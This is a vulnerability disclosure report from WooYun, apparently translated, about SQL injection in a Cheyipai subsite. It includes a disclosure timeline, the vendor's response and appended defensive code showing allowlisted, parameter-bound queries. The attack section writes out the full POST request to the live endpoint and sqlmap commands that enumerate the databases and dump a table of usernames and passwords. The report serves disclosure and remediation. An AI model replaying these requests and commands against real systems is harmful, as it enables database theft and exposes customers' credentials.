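Vulnerability summary

Bug ID: wooyun-2015-0158482

Title: SQL injection vulnerability in a Cheyipai (车易拍) subsite

Vendor: cheyipai.com

Author: 小苹果

Submitted: 2015-12-06 00:45

Fixed: 2016-01-21 10:30

Published: 2016-01-21 10:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]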


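Vulnerability details

Disclosure status:

2015-12-06: Details reported to the vendor; awaiting vendor handling
2015-12-07: Vendor confirmed; details disclosed to the vendor only
2015-12-17: Details disclosed to core white hats and experts in related fields
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public

Brief description:

A Cheyipai subsite has a SQL injection vulnerability. There are 14 databases, and a large amount of customer information was leaked, including names, email addresses, phone numbers, and account passwords.

Detailed description:

POST-type injection: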

POST http://liantong.cheyipai.com/Auction/List HTTP/1.1
Origin: http://liantong.cheyipai.com
Content-Length: 113
Accept-Language: zh-CN,zh;q=0.8
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Dnt: 1
Host: liantong.cheyipai.com
X-Requested-With: XMLHttpRequest
Cookie: gaofeng=gaofeng; DMPESHOP=[long hex session value omitted]
Referer: http://liantong.cheyipai.com/PContrller/Auction/Index
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

zcd=&szd=&price=&score=&level=&carAge=&Mileage=&orderBy=PreviewTime&orderByType=DESC&carName=null&domain=liantong


sqlmap -r 2.txt --dbs


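There are 14 databases.

Proof of vulnerability:

The databases found are shown in the figure:

[Image: Screenshot 2015-12-05 12.13.55 PM.png]


I picked one database at random for injection: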

sqlmap -r 2.txt -D NewScoredb --tables

[Image: Screenshot 2015-12-05 12.14.17 PM.png]

sqlmap -r 2.txt -D NewScoredb -T Score_UserInfo -C UserName,Password --dump-all
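A large amount of customer information was leaked:

[Image: Screenshot 2015-12-05 12.14.50 PM.png]

Remediation:

Disable it or filter the input.

Copyright notice: when reposting, please credit the source 小苹果@乌云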
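
An added illustration of the "filter" option in the remediation above (not code from the report or from the vendor): the POST body carries a sort column and direction (orderBy, orderByType), which cannot be bound as SQL parameters and therefore need an allowlist, while the other fields can be bound. The report does not say which parameter was injectable or which database the site runs; the table, the column names and the use of sqlite3 are assumptions.

```python
import sqlite3

# Allowlists for the parts of the query that cannot be bound as parameters.
# Column names are assumptions; only PreviewTime appears in the request.
SORT_COLUMNS = {"PreviewTime": "preview_time", "Price": "price", "Mileage": "mileage"}
SORT_DIRECTIONS = {"ASC", "DESC"}


def build_list_query(form):
    """Return (sql, params) for the listing, rejecting unexpected sort input."""
    order_by = form.get("orderBy") or "PreviewTime"
    direction = (form.get("orderByType") or "DESC").upper()
    if order_by not in SORT_COLUMNS or direction not in SORT_DIRECTIONS:
        raise ValueError("unsupported sort option")
    sql = "SELECT id, car_name, price FROM auction WHERE domain = ?"
    params = [form.get("domain", "")]
    car_name = form.get("carName")
    if car_name and car_name != "null":       # the client sends the literal "null"
        sql += " AND car_name LIKE ? ESCAPE '\\'"
        escaped = car_name.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
        params.append(f"%{escaped}%")
    if form.get("price"):
        sql += " AND price <= ?"
        params.append(int(form["price"]))      # ValueError on non-numeric input
    # Only allowlisted identifiers are concatenated into the statement.
    sql += f" ORDER BY {SORT_COLUMNS[order_by]} {direction}"
    return sql, params


def list_auctions(conn, form):
    """Run the listing query with every user-supplied value bound."""
    sql, params = build_list_query(form)
    return conn.execute(sql, params).fetchall()


def demo_db():
    """Constructed sample data, in memory only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auction (id INTEGER, car_name TEXT, price INTEGER,"
                 " mileage INTEGER, preview_time TEXT, domain TEXT)")
    conn.executemany("INSERT INTO auction VALUES (?,?,?,?,?,?)", [
        (1, "Sedan A", 50000, 30000, "2015-12-01", "liantong"),
        (2, "SUV B", 90000, 10000, "2015-12-03", "liantong"),
        (3, "Coupe C", 70000, 20000, "2015-12-02", "other"),
    ])
    return conn
```

Values that fail the allowlist or the integer conversion raise ValueError before any SQL is executed, so the handler can return a 400 response instead of a database error.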


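Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmation time: 2015-12-07 10:22

Vendor reply:

The exploit was carried out after logging in with the weak password exposed in a previous vulnerability and obtaining the cookie, so it also counts as a successful penetration. Thank you for the submission; we will fix it as soon as possible.

Latest status:

None yet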

